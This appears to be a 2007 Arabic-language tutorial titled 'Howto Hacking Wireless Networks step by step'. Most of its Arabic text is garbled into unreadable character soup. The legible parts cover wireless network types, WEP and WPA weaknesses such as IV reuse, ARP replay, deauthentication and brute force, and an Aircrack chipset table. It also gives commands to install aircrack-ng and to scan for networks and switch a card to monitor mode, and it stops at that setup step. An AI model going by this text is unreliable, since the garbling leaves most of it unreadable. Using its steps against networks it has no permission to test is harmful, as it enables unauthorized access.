howto-hacking wireless networks-arabia
http://www.t0010.com ����� ا��رق ا���و���
�����א�א����א������ �
� �������������א������ �
ProXy-BrokeN ####################### Br0ken r0x######################
# Lesson : Howto Hacking Wireless Networks step by step # # Author: BrokeN-ProXy # # Page: www.3asfh.net & www.sniper-sa.com # # Contact Me 0nly email: [email protected] # # Msn Messenger : [email protected] # ####################### r0x just do it ############### #####
Hacking Wireless Networks
© Copyright #₪₩~ BrokeN-ProXy #₪₩~ 2007
�������������������� ����א$��#"!�א$��#"!�א$��#"!�א$��#"!�����א� ���א� ���א� ���א� �������
�()�'�א�&�%��*�
http://www.3asfh.net/vb/
�()�'�א��*�%,�א�&�+*�� �
http://www.sniper-sa.com/forums/
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
T0010.COM
�1�23*�0א/��.�א-�������## (����1�23*�0א/��.�א-����45(����1�23*�0א/��.�א-����45(����1�23*�0א/��.�א-����45(����45����##� �� �� �� �� �php.index/books/com.0010t.www://http
� �� �� �� ���א����+�א$��#"!���67�8 �
--------------------------------------------------------------
aLT3rEQ$Hacker ---------------------------------------------------------------
��W>=א�א����+�:>(א;�:9 �
+���א�*�@��א��?�8/=א�א�� �
�Y(א�i>=א�א��א-��6,�א-��6,�א-��6,�א-���Z:,6א!�Z:8א!�Z:8א!�Z:8א!8Eא�;�E�������אM�X��"n���8�Zא�+���0*1��o�*א���א�pSא"��KK�� �� �"������qא��rM�sp"M�rM�)(�MHacking��������Dq���0q6�&�(����)W�("�T)t����"�OY���06�&�(����)W�(��()��"u�vFE�
qq�:"��(�Zw�qq��xuSא����،�����L�qq*א���qq��r�qq�!�rM�zqq*lMN"Sא����qq�����{qq� (�|=qqא��FF��$��qq!M��}��qq�M��qq�/א���qq(uS����{��KK���!Mא-��6,M�������������������Dq!�[�_�q��*�qA"��q(|�א�q=א'�"�Sא'�א�q~aא��R�q�:"��q6\!Sא���q����q(א/�א��=<����q�&א�
"�,���e�&-א�+���EEא-��6,�@ �� �
{�e���)&��+����@(א_����4���)����]��&����!���r����"�0>=א�א����+�������rא�"�(���W�ZM>=א�א��W� �� ��� ��_$"M�W&W���_�����EFא��'���Dא��א�#Z$�qא��Wireless�K� �
� �_��!����W�,6�V-א"�'���D�8א�E�(א���א�� �pא��"���S����8���K� �� ��_�a����W��!�[א����'F��+�3%M�6א��&����،��)m�TR"U-�5'�א�Dא�"א��D�����EFא��'��� �������������M��Vא�#Zא�������Vא����6��@�r4�3������*<�)W�(�$"��K� �
� �����������*���!�������4�~Dq�5��q��א��5�Dq'���א��q<�J�q����rwא/�M���.�5�qא��&�K"א�a~�א'�א-��א��q6\!M�[�T)qWא�
��@�K&p����!�KD����V��r�*�&��(�'���*��]���*���א-&��Sא��V6\!"��V���K� �� �
��7�Z����/���15א���������������q���Y-�4א�~Dq�5�����qא��qא�[�"� �q����q\!א���� ��[�O�5�4�e�0��.���q5"��zq*lM���qqq�����,6��qqq-א�+��qqq@�3א���qqq�(�rM��T���qqq~-א�v"�"�|)qqq3���qqqא�&������������qqq(�6���V�qqq�!M��(�qqq ���V�����qqq@"�V�
���*�� ����j1א�eR�[��6<��-א�&����"א"����FEא��N")א��[��� ���K"א� �
� �
��(=A�KKKKKWARNING�
���Dא����Dא����Dא����Dא�����EFא��'����EFא��'����EFא��'����EFא��'F�F�F�F�WLANEEEE����WWWW� �� �� �� �
s�%M�����������������������q����Fא��6�q���q<"��q����5�qא�&�S���zq��"��)(�(�r����|M�[�4�*�����rא��dYDא����rwא�
�N�qqq6�4א�qqq��5א�|M�r")qqq�"�zqqq���(�"M�4qqqE�(�rM� � ��qqq(�8"א�qqq!"#א���)qqq(��0qqq(����qqq!#!$א�[�s�7qqq�א��qq����t�qqk��qqא'�@Oqqk��5�qqא�rא����5�zqq�1��(�e��qq-א�r�qq�����s�qq%M"�����qqא��'�qq1�'F��qqא��NFqqZ�0qq�!�-
��!#!$���N�7�F��N�6א��iא)Y�E�8א��kSאK� �
5"qqq<�4qqq��Dq�8א�q<"�T)()א����*�����'�א�����qא�qqq������qEF=א�����4א���FWLAN \wireless local
area networkE�����qqq(Rא��א�T��qqq@:��qqq1��qqq!#!$א����Dqqq��N�7qqq�$����qqq�*�� qqq�"���Fradio�qqq<�s6=��א�
frequency/RFE�FES��1א�N�7�$א����$)���K� �
����M��*Z����8א�*����א���qEFא�����א����*���iא)Y�Eא��V�e�dYDא�� � ��(�X��5א���S��1א�T���1�8Ve���qq!#!$���K�4qq%"�)qq�"�������i�qq1�N�qq�����qq&א��;�qq�M� qq���[�`$wא�'�qq���9:��*Z��qqא����qq�*א��R)qq1��٢٠٠٥�
"�z�1��*Z��6(���*���א�*����א��&�7*1,���t���(�N�7�F����W� �
����EFא��'���D��1א����)������EFא��'���D��1א����)������EFא��'���D��1א����)������EFא��'���D��1א����)��
١١١١� J� J� J� J ����EFא������� ��������FFFFwireless computer cards����EEEE� ���'�א��6������א�����EF� ���'�א��6������א�����EF� ���'�א��6������א�����EF� ���'�א��6
������"M�N�6א��.�V����TR�W���r����)�"���������r����)��"M��Z��.�VW�|Me�p��0����"�����q�� ��q<�|�q=��א�A8W��Z�"M�8�ZאR�8tא�<�z�1�K� �
�8��EF�5"'�א��Lא�!M�8��EF�5"'�א��Lא�!M�8��EF�5"'�א��Lא�!M�8��EF�5"'�א��Lא�!M�W�W�W�W� �� �� �� �
� �
���� ��TUVW����8��E$�'�5א-�
��\�F�W�eq����8�]�)��8��E$�'�5��V��)W�(��*(#*E���e����N�6א��TUVWM��.�Vא�� ��� �
�TUVW���8��E$�'�5א�����6!��01PCMCIA
����"א�����6!��01� �TUVW����8��E$�'�5USBא-�
٢�� J�� �!�N�%א���Faccess pointEW�� �
����א$!#!������D������EFא�����א��'���D�47א��K�����*Z�qE����!�z�1�|��A�Xא'�א��t� ������*������M����������������������Dq����0�7q���q%�Z���1�*q%���q6����������T�t� א�����Z�8t��1>�א�N�%א���� �!����D��4�����e
0�p�M�N����E���1 �'�א .
""""�(�k�v�D��i��!�`�E�(�k�v�D��i��!�`�E�(�k�v�D��i��!�`�E�(�k�v�D��i��!�`�Ee��V�(����5��e��V�(����5��e��V�(����5��e��V�(����5��qqqq+����8>=א�א����+�8>=א�א����+�8>=א�א����+�8>=א�א�� �� �� �� �
� �
�'�qq�*����K���qq�����qq�Yא�� ���qqV�eא����qq��)qq5�� �א$!��Dqq�������qq/א�����qqEF،�"א�qqEא"���qq�،���qq1R"�،��r�qqeא�4a��'��En�W�� �
Institute of Electrical and Electronics Engineers (IEEE)
Internet Engineering Task Force (IETF)
Wireless Ethernet Compatibility Alliance (WECA)
International Telecommunication Union (ITU)
����t��R�VW�T)&���#D� J�(��-א�)������،_Fa������4q6&א��'�q1�6��i�q��� IEEE ����4q�!��q���5�Kq(�&����q��'������qZ��9:�.�qVW�F��_Faq א-&����،،��������qSא��qA�;��qא��"M��q(�(Rא��'�qW���iא)Y�qEא;���א�qE�E�q�5"K
'$�7�F��N�E�א�����E"�iא)Y�Eא����z��"��K� �
،����EFא��'���Dא��J�(�����(� ��;�*�M 4a��'��En��r�e IEEE ����q�� א��T�אR�q����qV�������q *א����q1"�،|RR#א��r��Sא"�،��(���"�، ����EFא��N�7�$א�'���D��T)(�e�x�ZM. � �
��)��K(�&�J�(��J�(��J�(��Jא-�&�)�Kא-�&�)�Kא-�&�)�Kא-
���'�א������D�4א�a����'���Dqא��K�*7q���� �، ����qEFא��������Xqא��'�e��q-א_�:�9אR�*�qEא��q���¡�Lא�q!M��6qp��'�!������:��N�Eא��E �<�1������EFא��'���Dא��Lא�!M����L�!�45��1�� ����T=�*������*E".� �
١�K�� *א���&Eא"�����EFא��N�7�$א�'���@)WWAN (W� �
��'�q�*����q¢�l WWAN �������q1�����qE$�'$�7qא��J�qE����q��,�)Y��q-א ��&����'�א�&����qא�Dqא���"M�T)q��%�mא�'���Dא�K�� �
"{k�*��Y(א�i>=��א��1�'$�7�$Eא��� �&Eא"���eא�~W�N")א�"�r)-�4אa��،��� qא-�א��iא)Y�Eא�NFZ����"M�'��tא/�א�TR)&�� ����EFא����)mא�|�e���4������T�e���M�K!\��6א�6�S��א�7*����1א- �
'��*���`�&£� WWAN �8!�aא��������!\��6א���4א�F2G�E�����8!�qa�4א�qא����q6\!M��6�q�� Global
System for Mobile Communications �(�GSM�)�"�، Cellular Digital Packet
Data �(�CDPD�)�"�، Code Division Multiple Access �(�CDMA�)�. �
�N�7א��'���@����N���!F��R�Vא���e���� �8!�qaא���4א��������R")q��N¤�qo��q�!���:��V�q&��cq�� �Xqא�"�،�T{eא���61���_�����i)1�9:��e�p��� �V�&��,���9:��e�pא��_�E����� ���E�X�2א���a���9*��'�א���4א�:�،
Oe�� ��&א��N���N¤�j����!���א�:�K ¤jD� ITU 2��a�4א��j���8��61�}������(� ����D*�. � �
٢K�)�WMAN�(�Wireless metropolitan area networks W� �
��'�q�*����q¢�l WMAN ���������qE$�'$�7qא��J�qE����q��,�)Y��q-א �������q� *���6qp�TR)q&��� qא����,q����!)�F"M��*�&���*()��[��������¥r����T)1�,��_Fa���4aא- �� �i�1�r����[�"M�8&��W�i����6p�E���r")q��
`���Sא�'F���Kא���M���t"�א���F'�א�*�OW��"���E�3אm �� א�������א�&�����-(�5 �
��9:��e�qp������'���Dq���q� �،cq�u� WMAN rM �������[�cq�u"�،�����qא��N�7q�$א�'���Dq���1)q5�4q6&�N�7�$א����D��T�Wn-א��� m& �4א������ �����א��K� �
Lא�!MLא�!MLא�!MLא�!M ����EFא��N�7�$א�'���@����EFא��N�7�$א�'���@����EFא��N�7�$א�'���@����EFא��N�7�$א�'���@
'���@�i)Y��� WMAN ���4q�*��;א�q6א���qA��&@Sא�"M��(�(Rא��א��א��Sא �'�q!���)RUqא�Rא� ������zq�1��q"א����'�א�N�7�$א��1�����EF)���א�* ��@��e���X�1'�������1 "א����9:!#!���:�N�%א���,�)Y��6��K� �
�����4qa��،�q���¡�'�q�*���iא)Y�qEא��q�� multichannel multipoint distribution service
�(�MMDS�)� " local multipoint distribution services �(�LMDS�)���4q61��q1�6���6����،
IEEE 802.16� ���N�q%א���J�(�q�- �����q ��[���q *א���(�q1�8��qEFא�������=q<��(�q ��)q������'��q%א-�א��('��*��� .א� �
٣�Kא���������EFא��N�7�$א�'���@)WLAN (W� �
��'�q�*����q�l WLAN �������6qp�����qE$�'$�7qא��J�qE����q��,�)Y��q-א ����q�����q� *�F���4��qE�zq�1��6p�،N�a-אz*���� ��4a��i�1�r����[�"M�،�5�@�"M���KE� �
��q� ��'���q@�iא)Y�qEא WLAN �-א��q���-א�[��������q�5����q��5�r�q���2q���x�qZM��5�q�M�[�"M��q��n
���_����q!�TO�q5�'F��qא��������q@�9:��e�qp����"M�، LAN ������q��r��)Y��q-���6א�q(�zq���TR�qW�� ��[�4q6&א�����¡�'��"M�["�;�*��������6pא�¡� ��א�K� �
���'���Dq���q� WLAN �4q6&��rM �,��(�q ���K�'���q@�[ WLAN �����4q6&א��'�q ��47q�����qE�ESאEFא������F'��� �� ��TUVWM �������q�W��Z�iR�q��TUqVWM�"M��q(�(Rא��N�7qא�����q@�E�����8��qEFא��N�q%א�����q�!� q�
��j5�46&��Xא� ����Dq�����E�ESא���*����'��K�,�� �'�א�&�46"א�q@�[ WLAN ����9:�Oq\!�L�q!��q�O\!K�� �
��TR")qq���qq� *��[�,�)Y��qq��T)qq&���qq� ��'א�lnqq���qq1���4qqa��،��N�7qqא�����qq@א����Dqq(�rM�،�qq��n�� �r"RN�%"����!�iא)Y�Eא����Dא��R�א���9:�N�%����¥LאR���*<���(א���u:�،�.� �
�[i�1 1997��R�%�، IEEE �}�����z�1١١}٨٠٢'���D��WLAN �����'�q!���،�"א�=|�§�4q�!��1�qE�R)qא����١ �9:٢��q�!�a��������~����K���}�q��6���_�q�e"b٨٠٢{١١�����)q()א��}�q��-�0אq!�5"�")q�(�|=qא�� �� ��q-א����q(�،�
��<�)��x�7���1����'�!���٤}�٢��~���������z�1���!�aא�#١١�RR!��4א� �W~U��<��K� �
���<��Z��)()W�}����a١١}٨٠٢،�����<�)q��x�7q���1����'�!�����~�����zq�1��q�!�a�����q���q ٥٤א�=|�§(�R!��4א��RR#٥א��~�W��U��<.� �
� �
٤�K�)�WPAN�(�Wireless personal area networks �W� �
'�qq�*����qq�l WPAN א�qq��,�)Y��qq- �TUqqVW����qq�e�5�����qqE$�'$�7qqא��J�qqE��F4qqa�� PDA�،TUVWM�"M�،�(��mא�Kא����6 א/�א������� א����q;� (POS) �א-��א��e��6p�T)W;�א�&�46א��E�87qYDא��6
POS ;א������< ��e����z���i)Y����١٠א�=|�§�����-��M���K� �
_����� '��*��� WPAN 8<���E�ESא Bluetooth &@Sא;��"א�q6א���qA����K��q�*�� Bluetooth ���8q<i)Y����4�������()����*�� �z���'�e����9:�'�!�����א��א��אR)�)���*��4א�S٣٠א_��)����K� �
�'�q!����4�!��� Bluetooth �����qtא���"�+�qא��"�rא�)qא���q1"�����q�*����(�q ����q( Bluetooth ����q����q1�6��4q�� ����z6�q���q�*���qV���q6=��א�V� Bluetooth Special Interest Group (SIG)���Xqא��،
'�D! '��%א�� Bluetooth ��٠}١א�%(א�i�1�١٩٩٩�KO~%��� !��6p�TUVWS�4�()4،����4%א�D� �_א)WF١4�M�"M�#��E�;א��6א��A��&@S���'�k���,�:!�D;�א��)Y��6����� �،. � �
���'�q�*����(�q ��)q������ WPAN���qEM�، IEEE ���4q6&א���q1�6١٥}�٨٠٢��'���Dq�� WPAN ��i�q�������J�(�q����(�q ����=q<�4q6&א���q1�6�� WPAN��'��q%א���*�Rא_�:�9qEא�، Bluetooth ��א)q%1.0 א�.
����،�qq�� א���FV�qqEא���qq�©�،)qq��&����!���qqא��Dqq~���4 א)qq<Sא`�א��qq�t����qq/=��א-����qq�©�8qq<�J�(�qqא�:�N�7א��'���@� ��{eא����NR،�"א���.١١}٨٠٢א- �
��W�W�W�Wא-7(��א-7(��א-7(��א-7(�� �� �� �� ��("R��<�+�1� ����("R��<�+�1� ����("R��<�+�1� ����("R��<�+�1� ������������������������������������W�W�W�WTeT_TaT�)(U6����)(U6����)(U6����)(U6����8����WWWWא�z�1��~pא��א���א�����8א�z�1��~pא��א���א�����8א�z�1��~pא��א���א�����8א�z�1��~pא��א���א� �� �� �� �
http://www.arabhardware.net/forum/showthread.php?t=27438&highlight=WLAN
���������������L�qp�-א� q���KqpM��"���3�p�� �א-��z�1���)1����������������L�qpא-�RM"�L�p���W�&��א��7��א�q���KqpM��"���3�p�� �א-��z�1���)1����������������L�qpא-�RM"�L�p���W�&��א��7��א�q���KqpM��"���3�p�� �א-��z�1���)1����������������L�qpא-�RM"�L�p���W�&��א��7��א�q���KqpM��"���3�p���z�1���)1�MMMM����qp����qp����qp����qpא-�RM"�L�p���W�&��א��7��א�0W����`�E�|=א����e0W����`�E�|=א����e0W����`�E�|=א����e0W����`�E�|=א����eK�K�K�K�
)W�(,1�!��_�����א����$�5'�����)����)Y����'�א���q6<"�����EFא-�Dא��O�D����WEP , WPA
��`�E"6V*1�����!��4�7�������KK� �
١� J���N�5����Wired Equivalent PrivacyW�� �
��RM��RM��RM��RM��)qqV&��[�r�a��qq��*��IEEE�������qqא�Sא��k�qqY-א��qqVWא���[�����qqEFא��'���Dqqא���@�Dqq<��،�c�=qq��������N�q5��"�����67����>=��א/������������������������qא��'���Dq����q�e��-���%�7אqmא��qE�0אq��1��q��kM��q(�
FWired Equivalent Privacy�E��+����$�`�1�|=א�"WEP�K�� �
�N�qqq5��"���)qqq6���Z�zqqq�1�0qqqא�.��WEP���z1)qqq��O�Dqqq���qqqא1�*��[�RC4��{qqq��A"�'�qqq� &-א�O�Dqqq������%�7qqmא�،���qq� �TOqq Z�T�qq~��0qq�e�KDqq���zqqא5��F)�qqk�N�qq5��"א�א��=qq<�i(qq(��.�5�Vqq�����qq5�
��)Y���0�~��א�*\���T����1א���O�Dא-�(� 64 bit �"M١٢٨ bit `�E"T�~aא��v�@א�� (�E�4�D��K� �
�[�R�W���T�~aא�[Initialization Vector ]�IV�qא��IV�O�D��T�����<�٢٤�bit�L�!����RC4��8q<"����)Y�Eא;�א�E������٦٤�OR 128�������q���q�e�5��q�65� q6o��q��R�������IV����q"/=א�א��(�����q&(�
�,���٥٠٠�K�M�IV8����r�����9:�K�� �
�)qq&��!�rM� � ��qq!�cqq�u�cqq�٢٤�����qq�t�qq�R�����qq<��qqE�5}�:$�"��١٠)���qq��=qqZ����א�)���qq��rM��qqWא���qqא����<O�Dqq�"�rM�4qqWM��qq���T��7qqא��s�qq������`�qqE��qq5M�4�Dqq����qqq�0א�qq��5���v�qq@١٢٨אbit����"٦٤bit�r�Dqq1�
���0���r�e�&����i)Y����ª"��V(K� �
��q١٢٨א������������O�D��N"Sא�;Uא��,tUW����0!�����١٠٤����L�q!������RC4�����q<�8!�qaא��Uqא�"�IV���q<"�٢٤���q�����������O�Dq��zq�1���7q���V������١٢٨:uא��&�q*�����q�:"��q����qq���٦٤���q��������N"Sא�,tUqW��q��r�q���iFqא���Jq�!�
�O�Dqq�٤٠��L�qq!��qq���qq��RC4���qq<�8!�qqaא��;Uqqא��"�IV��qq<"�٢٤���zqq�1�47qqA�vא���V�qq&א��u:��qq��٦٤��qq���<�[�0�5�iF��WEP header،��iא)Y�Eא����א�*�{�)���4א��V-אWEP�z�1�WPA�r$�WEP���« �(�����EFא�����Dא��z�1��O����¬�F��O���&(����Dא���K� �
����EFא��'���Dא��Oq�D�����EFא��'���Dא��Oq�D�����EFא��'���Dא��Oq�D�����EFא��'���Dא��Oq�D�
٢� J��N�5����Fi Protected Access-WiW�� �
�V��V��V��V��i�1�N�5א���5�8!������٢٠٠٣>=א�א�������*�Sא����D-�4א��qWEP�� �WPA����qq����7q�Z�8אq<�Wi-Fi Protected Access��������"��q(�63���,���qE"��q�(� א���=q<��1)q��"�6< W
WPA with RADIUS� �{�3��,�q(�k��q1}�א��)q��"��eOqE�J()q�*�������� ]�>=��א� �)���)���rא1$��R�6]�א�)Y��q-א�'�(�<���
����:�R)7� 4(�k�v�@�9א��v�D"�א�����1�s�p>=א§�0!S����mאK��� �
WPA with PSK [pre shared key]
�&�$�6"�">=��א� �)���>��8Eא��a5SאrM� � ��!�������q���qVe��M�R)q1�0q6�5�|M�`�q&!�٨�9:�٦٣��"M�`�q��٦٤������Hexadecimal K� �� �
���qqqא�7qqq&��אZ#א����s�qqq%M�2qqq���_א)qqq��&���qqqa5M�'�qqq���&�Z�N�6א�.qqqEא���)qqq���"�=qqq<�z6�qqq��"��qqqV
��q����7q���� TKIP א�mא�.Z�8אq<"���qq���qq���qq���qq�Temporal Key Integrity Protocolא�"�Xq���4�Dq����6��qq��O�qq~����qq(�������i)Y��qq-�4אqq����qq��R��qqE���Y(א�iא�qqEא�� qqEא���i)Y��qq��4qq���O�Dqq����s���qqא���K�����4a��WEP���(�k"�IV�4V�א�����8������"�i)Y����4���������<"���0�(����5K� �� �
�e�p�������4qa��x�qZM�'�*��qA�9:�Message Integrity Code�q����4=|�"א�q61� q*-� qp"�ARP
Replay Attack��������Nא�i)Y��q������qE$����q@�R�qW"�0q����[�0q��� ��r�q������8qא��"��WEP�q<"א��=������ ��0��61����L��(�i�j/אIV������_��q(M�cq!M�9:��e�qp�����L�EM�4�D�����Dא���(��c���8������"�
rM� � ��qq��qq<�i)Y��qq��=א�������R)qq&א�� qq6o��)qq����qq&(�4~�Dqq(�)qq�M��qqV�e��qq�����Dqqא��r:��qq����[�i�qqj/א������~u:�i.$�0q!S��4א������������IVא- ��+�Dq�"����Dqא��cq��"���)q(����q*56o��q�� IV����cq�e���0אq�e�r�q�(�i.$�
�.�V�8�,�א�D �)1��J�5Sא"����EFא�����D����*(���K�� �� �
��q��� W�!��V-אWPA�r�������r"א��א+�>���؟؟�5����)���Vא�,�>�4��������&!�V�(����5������z6�q(�i�qj<�iא)Y�qEא�� qEא��Deauthentication Attack��������Dq�����(R�qW�-�47אq����q&(�
������������qqEFא�����Dq���i)Y��qq-א�N�qZR��qq��61��q�����)qq���r�Dq1��qq�!���T�q��r���Dqq(��V�q�©"�����qEFא�qqא���qq\3�8א��qq<"Xqq-א�,qq��O�Dqq����s���qqא��NR�qq����qqV�e���qq(��i)Y��J�qq5S��5"א�qq/א��<)qq&���qq*(���
��������0q?א�i�qj<�iא)Y�qEא�� qEא���O�Dq�)&�cq�(�N"�q§brute force attack�������q6��N"�q§��qא���������������q&(���)Y��q-א�R��qE�����z�1�)6������Tא�&(�i�j/�<�v�®"����Dא��O�D�����)Y�א����E��Rא-�
��R��E��א�u:٨V��������z�1��V��(�0!א�O�5�N�6����Z���K!�'�א� �
١K �J�*���i�\!�0��1��5���N�6�������65�.�VWK� �٢K � ��{eא����8��E�$�'�5Aircrack Tools
٣K Aircrack-ng Tools
�45�J��e�0���[���qE&�5�46'�"א)����Jא!�q!���zq�1�Aircrack ������ctא�q@�)q*1��=q���q5�c�=q���5(����4@�א;��M!�0)(��1א����rM���"�'������J�*����1)(�c�u�9:��e�p:�]��!��K� �
� �����x�qqE��5�Dqא����qqEא��qqV���q��{qqeא�������q*��� NETGEAR Or Linksys K�'�5�Dqqא���qq�א¯�
���§�Dqqא��L�qq!��qq�6<M��qqW�)�[Chipset]��8qq<�rS�_א)qqW��qq6V���§�Dqqא��L�qq!��qq&!�`�qqE�Xqq�4א�qq<�R)qqA�M�]���i�$�K(��1א��!� �
�����q<�J�*qq����1)q�"�]��q!��1א��)qq���§�q@�4�qeM��8Atheros�����]��qq!א��� q����zqq�1�;�q*��iFqא�א��=qq<"�www.aircrack-ng.org
The best chipset nowadays is Atheros. It is very well supported under Linux, and also under Windows (PCMCIA/CardBus only). Neither support any USB wireless devices. The latest madwifi-ng patch makes it possible to inject raw 802.11 packets in either in Managed and Monitor mode at arbitrary b/g speeds.
�5���N�6��.�VW� ��J�*���i�\!�0��1�
$�'�58��E �� ��{eא���aircrack tools
aircrack-ng tools
�[��V�)Y��!�`�E�Xא'�א�"RSא"�TUVWSא�[��V�)Y��!�`�E�Xא'�א�"RSא"�TUVWSא�[��V�)Y��!�`�E�Xא'�א�"RSא"�TUVWSא�[��V�)Y��!�`�E�Xא'�א�"RSא"�TUVWSא�א#Zא�א#Zא�א#Zא�א#ZאJ���(א��א�J���(א��א�J���(א��א�J���(א��א�
�6V���\�F��6V���\�F��6V���\�F��6V���\�F�
�[����>q=א�� �q!א��� qq���q�eא���,�א���qq"'�א-q(�N")qqW]��]��qq!א��� q�����qq��u�Z�q��N")qqא��[�"�qqא��L�qq!�46Dq(�q�chipset��1R�"��airodump���_��(M"�J�*���"�.")*(����aireplay �J�*����K� �
| Chipset | Supported by airodump for Windows | Supported by airodump for Linux | Supported by aireplay for Linux |
|---|---|---|---|
| Atheros | CardBus: YES; PCI: NO (see CommView) | YES | YES (driver patching required) |
| Atmel | UNTESTED | 802.11b YES; 802.11g UNTESTED | UNTESTED |
| Broadcom | Old models only (BRCM driver) | YES | IN PROGRESS (Forum thread) |
| Centrino b | NO | PARTIAL (ipw2100 driver doesn't discard corrupted packets) | NO |
| Centrino b/g | NO | YES | NO (firmware drops most packets) ipw2200inject |
| Centrino a/b/g | NO | YES | NO (See this thread for alpha injection support.) |
| Cisco Aironet | YES? | YES | NO (firmware issue) |
| Hermes I | YES | YES | NO (firmware corrupts the MAC header) |
| NdisWrapper | N/A | Never | Never |
| Prism2/3 | NO | YES | YES (PCI and CardBus only, driver patching required) |
| PrismGT | YES | FullMAC: YES; SoftMAC: NOT YET | YES (driver patching recommended) |
| Ralink | NO | YES (rt2500 / rt2570 / rt61 / rt73 driver) | YES, see rt2500, rt2570, rt61 and rt73. Also see Ralink chipset comments later on this page for important concerns |
| RTL8180 | YES | YES | UNSTABLE (driver patching required) |
| RTL8187L | UNTESTED | YES (driver patching required to view power levels) | YES (driver patching recommended for injection and required to view power levels) |
| TI (ACX100/ACX111) | NO | YES | YES (driver patching required) |
| ZyDAS 1201 | NO | YES | Partially (See patch for details) |
| ZyDAS 1211[B] | NO | YES | YES |
| Others (Marvel...) | NO | UNKNOWN | NO |
�����a���'�א�� �����L�� �
kernel headers
gcc
��_�&�k��z�1�dY@�45�����������8qא�"���qV�5�(��q� �0�&(.����±�mא�iUא���()�"��V�5�������א���.)&��א��8�����zq�1��q�*����q&(.���|M�,�5�q��Debian����������������������������������������������
Ubuntu , Xubuntu , Knoppix ]�[�8������א�Sא����("�����E�s ��אS"א�(��W� �
sudo apt-get install build-essential
�rw5!��#��8א��]� �א������KK8א��!�����Wא� �
wget http://download.aircrack-ng.org/aircrack-ng-0.9.1.tar.gz
tar -zxvf aircrack-ng-0.9.1.tar.gz
cd aircrack-ng-0.9.1
make
make install
�]��!������5���]��!������5���]��!������5���]��!������5������ Aircrack
���(�k]�����א��!�a�_א)W���VE�<"�8J�*���,�)Y����)*1��e"�&��KK���)7-א�������a���k)���א���_��(����J�*���]� ���e�5��א����)Y���"K� �
S���U�����!���3א���wget� �
wget http://pcmcia-cs.sourceforge.net/ftp/contrib/wireless_tools.28.tar.gz
���S���0 ~p�c�!tar� �
tar xvfz wireless_tools.28.tar.gz
���S����)���z�1�4Z)!���~א���ce�)&�cd
cd wireless_tools.28
���Sא�{� !���make� �
make
���i��!����*���7א��!���S���] make install � �� �
make install
������������qqV*��TOaqq5��qq���M�{qq"א ��TאRSא��=qq<��qq1� � ��qq��cqq!M�2qq���J���(א�qqא��U��qq���qq�5#���qq*6א��=qq�<"�iwconfig �"�iwlist �Oaא��"���F��V��@�R)7���*��K�E� �
���5�����5�����5�����5��wireless tools _אOa5��V*��)����!�`�E"�_א)W������_אOa5��V*��)����!�`�E"�_א)W������_אOa5��V*��)����!�`�E"�_א)W������_אOa5��V*��)����!�`�E"�_א)W������
�̀ �qE����q�Sא�i)Y��q!�iwlist ���F���������qא���q5���rM��q�wireless tools ����4q����4q���v�q@�|=qא������Sא�iא)Y�Eא� � ����E�� �
�23�����jא�!� �k�z�1Sא�[�sp��65>��"א�'R)�"���6��O����!�a���6"א���T)א�"�,���@�'�����S����Kא�rא-�6Vא-&�� �
c�������Xא��'���D�45א��d3ec�������Xא��'���D�45א��d3ec�������Xא��'���D�45א��d3ec�������Xא��'���D�45א��d3e� �� �� �� ���������scan all network around� �� �� �� �
bt ~ # iwlist ath0 scan
ath0      Scan completed :
          Cell 01 - Address: 00:14:7F:1F:27:6D
                    ESSID:"SpeedTouch433793"
                    Mode:Master
                    Frequency:2.462 GHz (Channel 11)
                    Quality=60/94  Signal level=-35 dBm  Noise level=-95 dBm
                    Encryption key:on
                    Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 18 Mb/s
                              24 Mb/s; 36 Mb/s; 54 Mb/s; 6 Mb/s; 9 Mb/s
                              12 Mb/s; 48 Mb/s
                    Extra:bcn_int=100
                    Extra:wme_ie=dd180050f2020101880003a4000027a4000042435e0062322f00
          Cell 02 - Address: 00:18:39:24:5C:F8
                    ESSID:"linksys"
                    Mode:Master
                    Frequency:2.427 GHz (Channel 4)
                    Quality=50/94  Signal level=-45 dBm  Noise level=-95 dBm
                    Encryption key:off
                    Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
                              9 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s; 36 Mb/s
                              48 Mb/s; 54 Mb/s
                    Extra:bcn_int=100
                    Extra:wme_ie=dd180050f2020101030003a4000027a4000042435e0062322f00
4��4��4��4����������U��iא)Y�Eא�[�;)����;�c��5�4(�A�c��1�����R�Monitor�N:�9א-�������Aircrackא���`�E��u�-Kא�؟�)����"5,� �
�،� ��r�q�(��i.$�Monitor modeא��q�"� sniffing ����zq�1�'�q���qj��|'�א���)q���r�D15���������q"א��א+��R�-א�z�1�r��(�vא��.�Vא���'�]�א��c�D�����N"MManaged���J�5S���N�7�$���±�Z�R�-א�א=<���*(� �
� ����'�5�4(�3���,��(�k�)W�(q��Monitor Mode�W� �
�9"Sא� �)���אW�{(�k��1�command lineK�� ����!�aא� �)���א�W�z6���U����{(�k��1�airmon-ng ���U�� ��8����Aircrack�
�R�-א�z�1�r��(�vא�א���'��c�D�����N"M�Managed ��4a�����!�5u�_����E�K� �
bt ~ # iwconfig ath0
ath0      IEEE 802.11b  ESSID:""  Nickname:""
          Mode:Managed  Channel:0  Access Point: Not-Associated
          Bit Rate:0 kb/s   Tx-Power:31 dBm   Sensitivity=0/3
          Retry:off   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
          Link Quality=0/94  Signal level=-98 dBm  Noise level=-98 dBm
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0
q��'�3)�4א������,���Monitor Modeא�v�D��i��M�`�E�rwא� �)� ����WאS"�9א� �)�� �
�{(�k��1command line �8&��،،،�����&�א� �
bt ~ # ifconfig ath0 down
bt ~ # wlanconfig ath0 destroy
bt ~ # wlanconfig ath0 create wlandev wifi0 wlanmode monitor
ath0
bt ~ # ifconfig ath0 up
bt ~ # iwconfig ath0
ath0      IEEE 802.11b  ESSID:""  Nickname:""
          Mode:Monitor  Frequency:2.412 GHz  Access Point: 00:0F:B5:EA:2F:AF
��R�-�4א���'�:�9א(�A��R�-�4א���'�:�9א(�A��R�-�4א���'�:�9א(�A��R�-�4א���'�:�9א(�A[ Monitor Mode ]� �� �� �� �
          Bit Rate:0 kb/s   Tx-Power:31 dBm   Sensitivity=0/3
          Retry:off   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
          Link Quality=0/94  Signal level=-98 dBm  Noise level=-98 dBm
